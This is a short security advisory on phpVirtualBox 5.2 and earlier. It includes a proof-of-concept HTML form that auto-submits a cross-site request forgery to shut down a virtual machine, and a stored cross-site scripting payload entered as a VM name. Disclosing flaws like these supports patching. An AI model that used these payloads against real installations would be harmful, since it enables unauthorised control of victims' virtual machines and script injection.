phpVirtualBox 5.2 Cross Site Request Forgery / Cross Site Scripting

phpVirtualBox versions 5.2 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

MD5 | 6f277017b55f2e0f361b3b4855a39fde

# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

The backend doesn't validate the origin of the actions.

- POC: Shutdown a VM

<body onload="document.csrf.submit();">
<form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
<input type="hidden" name="vm" value="<VM_ID>" />
<input type="hidden" name="state" value="powerDown" />
<input type="hidden" name="fn" value="machineSetState" />

[2]Stored XSS
Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application.

- POC: Insert a persistent script in the vm name field.

New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test

Related Posts